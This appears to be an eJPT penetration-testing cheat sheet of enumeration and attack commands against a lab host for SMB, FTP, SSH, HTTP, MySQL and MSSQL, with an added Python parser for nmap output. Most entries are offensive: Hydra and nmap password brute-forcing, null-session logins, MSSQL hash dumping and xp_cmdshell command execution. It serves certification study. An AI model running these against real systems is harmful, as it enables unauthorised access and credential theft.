nmap -p 445 --script smb-protocols 10.10.10.10
//Enumerates the supported SMB protocols on the target.
nmap -p 445 --script smb-os-discovery 10.10.10.10
//Discovers the operating system on the SMB server.
nmap -p 445 --script smb-security-mode 10.10.10.10
//Identifies the security mode employed by the SMB server.
nmap -p 445 --script smb-enum-sessions 10.10.10.10
//Lists active SMB sessions on the server.
nmap -p 445 --script smb-enum-sessions --script-args smbusername=administrator,smbpassword=smbserver_771 10.10.10.10
//Enumerates sessions with specified credentials.
nmap -p 445 --script smb-enum-shares 10.10.10.10
//Lists available SMB shares on the server.
nmap -p 445 --script smb-enum-shares --script-args smbusername=administrator,smbpassword=smbserver_771 10.10.10.10
//Enumerates shares with specified credentials.
nmap -p 445 --script smb-enum-users --script-args smbusername=administrator,smbpassword=smbserver_771 10.10.10.10
//Enumerates users with specified credentials.
nmap -p 445 --script smb-server-stats --script-args smbusername=administrator,smbpassword=smbserver_771 10.10.10.10
//Retrieves statistics from the SMB server with specified credentials.
nmap -p 445 --script smb-enum-domains --script-args smbusername=administrator,smbpassword=smbserver_771 10.10.10.10
//Enumerates domains with specified credentials.
msfconsole
[MODULE]> use auxiliary/scanner/smb/smb_version
[MODULE]> set RHOSTS 10.10.10.10
[MODULE]> run
//Uses Metasploit to gather the SMB version information. Every scanner module in these notes is driven the same way: use the module, set RHOSTS, run.
msfconsole
[MODULE]> use auxiliary/scanner/smb/smb2
//Uses Metasploit to check for SMB2 support.
nmblookup -A 10.10.10.10
//Queries the host's NetBIOS name table (host name, workgroup or domain, and the <20> file-server role). It does not report the SMB version; pair it with smb-protocols or smb_version for that.
smbclient -L 10.10.10.10 -N
//Lists available SMB shares on the server using Smbclient.
rpcclient -U "" -N 10.10.10.10
[rpcclient$]> srvinfo
[rpcclient$]> enumdomusers
[rpcclient$]> lookupnames admin
//Opens a null session (empty username, no password) with Rpcclient, then prints server information, lists domain users and resolves the name 'admin' to its SID.
enum4linux -o 10.10.10.10
//Gathers operating system information from the SMB server using Enum4Linux.
enum4linux -U 10.10.10.10
//Enumerates users on the SMB server using Enum4Linux.
nmap -p 21 -sV 10.10.10.10
//Performs a quick scan to check if the FTP port (21) is open on the target and identifies the FTP server software.
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/wordlists/rockyou.txt 10.10.10.10 ftp
//Conducts a dictionary attack on the FTP server using Hydra.
nmap 10.10.10.10 --script=ftp-brute --script-args userdb=/root/users -p 21
//Performs FTP brute force using Nmap.
nmap 10.10.10.10 -p 21 -sV --script ftp-anon
//Checks if anonymous login is allowed on the FTP server and lists what the anonymous user can see.
ftp 10.10.10.10
Name: anonymous
Password:
//Logs in manually as 'anonymous'; an empty password (or any e-mail address) is accepted when anonymous FTP is enabled.
nmap 10.10.10.10 -p 22 -sV -O
//Performs a quick scan to check the SSH service and identify the operating system.
nmap 10.10.10.10 -p 22 --script ssh2-enum-algos
//Enumerates all SSH algorithms supported by the server.
nmap 10.10.10.10 -p 22 --script ssh-hostkey --script-args ssh_hostkey=full
//Retrieves the SSH host key.
nmap 10.10.10.10 -p 22 --script ssh-auth-methods --script-args=ssh.user=Jack
//Identifies supported SSH authentication methods.
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.10 ssh
//Conducts a dictionary attack on the SSH server using Hydra.
echo administrator > user
nmap 10.10.10.10 -p 22 --script ssh-brute --script-args userdb=/root/user
//Performs SSH brute force using Nmap against the user list written to /root/user (run the echo from /root, or give userdb the full path of the file).
msfconsole
[MODULE]> use auxiliary/scanner/ssh/ssh_login
//Performs a dictionary attack on the SSH server using Metasploit (set RHOSTS, USERNAME or USER_FILE, and PASS_FILE, then run).
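The SMB and SSH scripts above produce output that has to be read for the security-relevant bits: whether SMB signing is enforced, which shares a null session can reach, and which SSH algorithms the server still offers. As an added example (my own code, not part of the original notes and not nmap's), here is a parser for nmap's normal (-oN) output that pulls the smb-security-mode, smb-enum-shares and ssh2-enum-algos blocks apart and turns them into findings. The embedded nmap output is constructed to match those scripts' normal-output layout rather than captured from a real host, and the weak-algorithm policy is an assumption for the example, not a list nmap ships.

```python
"""Turn nmap -oN output of smb-security-mode, smb-enum-shares and ssh2-enum-algos into findings."""
import re

# Constructed sample in the layout of nmap's normal output (not a real capture) for
# `nmap -p 22,445 --script ssh2-enum-algos,smb-security-mode,smb-enum-shares`.
SAMPLE_NMAP_OUTPUT = r"""PORT    STATE SERVICE
22/tcp  open  ssh
| ssh2-enum-algos:
|   kex_algorithms: (2)
|       curve25519-sha256
|       diffie-hellman-group1-sha1
|   encryption_algorithms: (3)
|       aes256-ctr
|       aes128-cbc
|       arcfour
|   mac_algorithms: (2)
|       hmac-sha2-256
|_      hmac-md5
445/tcp open  microsoft-ds

Host script results:
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
| smb-enum-shares:
|   \\10.10.10.10\IPC$:
|     Anonymous access: READ/WRITE
|   \\10.10.10.10\public:
|     Anonymous access: READ/WRITE
|   \\10.10.10.10\secret:
|_    Anonymous access: <none>
"""

# Assumed review policy for this example (not a list nmap ships): SHA-1 key exchange,
# CBC/RC4/3DES ciphers, and MD5 or truncated MACs are reported as weak.
WEAK_SSH_ALGORITHMS = {
    "kex_algorithms": re.compile(r"-sha1$"),
    "encryption_algorithms": re.compile(r"-cbc$|^arcfour|^3des"),
    "mac_algorithms": re.compile(r"^hmac-md5|-96$"),
}

def script_lines(nmap_output, script_id):
    """Body lines of one NSE script block with the '| ' / '|_' prefix removed."""
    body, inside = [], False
    for line in nmap_output.splitlines():
        if not line.startswith("|"):        # outside any script block
            inside = False
            continue
        text = line[2:]
        if not text.startswith(" "):        # a script header such as 'smb-enum-shares:'
            inside = text.startswith(script_id + ":")
        elif inside:
            body.append(text)
    return body

def indent_key_value(text):
    """'    Anonymous access: READ' -> (4, 'Anonymous access', 'READ')."""
    key, _, value = text.strip().partition(":")
    return len(text) - len(text.lstrip(" ")), key, value.strip()

def smb_security_mode(nmap_output):
    """Fields of smb-security-mode, e.g. {'message_signing': 'disabled (...)'}."""
    return {k: v for _, k, v in map(indent_key_value, script_lines(nmap_output, "smb-security-mode"))}

def smb_shares(nmap_output):
    """UNC share name -> attribute dict from smb-enum-shares."""
    shares, current = {}, None
    for indent, key, value in map(indent_key_value, script_lines(nmap_output, "smb-enum-shares")):
        if indent == 2 and key.startswith("\\\\"):    # share header line
            current, shares[key] = key, {}
        elif indent == 4 and current:                 # attribute of the current share
            shares[current][key] = value
    return shares

def anonymous_accessible_shares(nmap_output):
    """Sorted (share, access) pairs that are readable or writable without credentials."""
    return sorted((n, a["Anonymous access"]) for n, a in smb_shares(nmap_output).items()
                  if a.get("Anonymous access", "<none>") != "<none>")

def ssh_algorithms(nmap_output):
    """Category -> offered algorithms from ssh2-enum-algos."""
    algos, current = {}, None
    for indent, key, _ in map(indent_key_value, script_lines(nmap_output, "ssh2-enum-algos")):
        if indent == 2:                  # category line such as 'kex_algorithms: (2)'
            current, algos[key] = key, []
        elif current:                    # one algorithm name per deeper line
            algos[current].append(key)
    return algos

def weak_ssh_algorithms(nmap_output):
    """Category -> offered algorithms matching WEAK_SSH_ALGORITHMS (clean categories dropped)."""
    weak = {c: [n for n in names if c in WEAK_SSH_ALGORITHMS and WEAK_SSH_ALGORITHMS[c].search(n)]
            for c, names in ssh_algorithms(nmap_output).items()}
    return {c: hits for c, hits in weak.items() if hits}

def findings(nmap_output):
    """One line per finding, ready for the engagement notes."""
    out = []
    if smb_security_mode(nmap_output).get("message_signing", "").startswith("disabled"):
        out.append("SMB signing not enforced: SMB/NTLM relay against this host is possible")
    out += [f"share {s} accessible without credentials ({a})" for s, a in anonymous_accessible_shares(nmap_output)]
    out += [f"weak SSH {c}: {', '.join(n)}" for c, n in weak_ssh_algorithms(nmap_output).items()]
    return out
```

Feed it the file written by `nmap -oN` (for example `findings(open("scan.txt").read())`); on the constructed sample it reports the missing signing requirement, the two shares open to a null session, and the SHA-1 key exchange, CBC/RC4 ciphers and MD5 MAC. The parser keys on nmap's two-space indentation per level, so structured output is not required, but the `-oX` XML form is the more robust choice when the tooling grows beyond a notes script.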
nmap 10.10.10.10 -p 80 -sV -O
//Performs a quick scan to check the HTTP service and identify the operating system.
whatweb 10.10.10.10
//Utilizes WhatWeb to fingerprint the web stack (server software, frameworks, CMS and their versions); those versions are what you then look up for known vulnerabilities.
http 10.10.10.10
//Sends a GET request with HTTPie and prints the response headers and body to gather information about the web server.
dirb http://10.10.10.10
//Uses Dirb to discover common directories and files on the web server.
nmap 10.10.10.10 -p 80 -sV --script http-enum
//Executes Nmap scripts to enumerate information about the HTTP service.
nmap 10.10.10.10 -p 80 -sV --script http-headers
//Retrieves detailed HTTP headers from the web server.
nmap 10.10.10.10 -p 80 -sV --script http-methods --script-args http-methods.url-path=/webdav/
//Identifies supported HTTP methods, with an additional check for the '/webdav/' path.
[MODULE]> use auxiliary/scanner/http/brute_dirs
//Uses Metasploit to brute force directory names on the web server.
[MODULE]> use auxiliary/scanner/http/http_version
//Identifies the version of the HTTP service using Metasploit.
[MODULE]> use auxiliary/scanner/http/robots_txt
//Scans for the existence of robots.txt using Metasploit.
nmap 10.10.10.10 -p 3306 -sV -O
//Conducts a quick scan to check the SQL service and identify the operating system.
nmap 10.10.10.10 -p 3306 --script=mysql-empty-password
//Checks if the MySQL server allows login with an empty password.
nmap 10.10.10.10 -p 3306 --script=mysql-info
//Retrieves detailed information about the MySQL service (version, protocol, capabilities).
nmap 10.10.10.10 -p 3306 --script=mysql-users --script-args="mysqluser='root',mysqlpass=''"
//Enumerates MySQL users on the server.
nmap 10.10.10.10 -p 3306 --script=mysql-databases --script-args="mysqluser='root',mysqlpass=''"
//Lists the databases present on the MySQL server.
nmap 10.10.10.10 -p 3306 --script=mysql-audit --script-args="mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit'"
//Audits the MySQL configuration against the CIS benchmark rules shipped with Nmap.
nmap 10.10.10.10 -p 3306 --script=mysql-query --script-args="mysqluser='root',mysqlpass='',query='select count(*) from books.authors;'"
//Executes a specific query on the MySQL server. Quoting the whole --script-args value keeps the shell from splitting it at the spaces in the query.
mysql -h 10.10.10.10 -u root
//Logs into the MySQL server as 'root' without a password.
[MODULE]> use auxiliary/scanner/mysql/mysql_login
//Performs a dictionary attack on the MySQL server using Metasploit.
hydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 10.10.10.10 mysql
//Conducts a dictionary attack on the MySQL server using Hydra.
nmap 10.10.10.10 -p 1433 --script ms-sql-info
//Gathers information about the MSSQL service.
nmap 10.10.10.10 -p 1433 --script ms-sql-ntlm-info --script-args mssql.instance-port=1433
//Retrieves NTLM information from the MSSQL server.
nmap 10.10.10.10 -p 1433 --script ms-sql-brute --script-args userdb=/usr/share/wordlist/common_users.txt,passdb=/root/Desktop/wordlist/100-common-passwords.txt
//Performs a brute force attack on the MSSQL server.
nmap 10.10.10.10 -p 1433 --script ms-sql-empty-password
//Checks if the MSSQL server allows login with an empty password.
nmap 10.10.10.10 -p 1433 --script ms-sql-query --script-args="mssql.username=admin,mssql.password=password,ms-sql-query.query='SELECT * FROM master..syslogins'" -oN output.txt
//Executes a specific query on the MSSQL server and saves the output to a file; the whole --script-args value is quoted because the query contains spaces.
nmap 10.10.10.10 -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=admin,mssql.password=password
//Dumps password hashes from the MSSQL server (requires a sysadmin login).
nmap 10.10.10.10 -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=password
//Runs the script's default command (ipconfig /all) through the xp_cmdshell stored procedure on the MSSQL server; needs a login with sysadmin rights.
nmap 10.10.10.10 -p 1433 --script ms-sql-xp-cmdshell --script-args="mssql.username=admin,mssql.password=password,ms-sql-xp-cmdshell.cmd='type C:\flag.txt'"
//Executes a specific command through xp_cmdshell on the MSSQL server.
[MODULE]> use auxiliary/scanner/mssql/mssql_login
//Attempts to login to the MSSQL server using Metasploit.
[MODULE]> use auxiliary/admin/mssql/mssql_enum
//Enumerates information about the MSSQL server using Metasploit.
[MODULE]> use auxiliary/admin/mssql/mssql_enum_sql_logins
//Enumerates SQL logins on the MSSQL server using Metasploit.
[MODULE]> use auxiliary/admin/mssql/mssql_exec
//Executes commands on the MSSQL server using Metasploit.
[MODULE]> use auxiliary/admin/mssql/mssql_enum_domain_accounts
//Enumerates domain accounts through the MSSQL server using Metasploit.
In conclusion, mastering the art of information gathering is fundamental in ethical hacking and penetration testing. This compilation of notes, crafted by Amr Elsagaei, serves as a reference throughout the eLearnSecurity Junior Penetration Tester (eJPT) journey.
These insights into network mapping, service enumeration, and vulnerability assessment techniques equip aspiring security professionals with the skills needed to identify and address potential threats. Approach ethical hacking responsibly and within the agreed scope, so that security testing keeps its integrity.
As you progress through your eJPT certification, continually expanding your knowledge and staying abreast of emerging tools and methodologies will contribute to a successful and rewarding journey in the field of cybersecurity.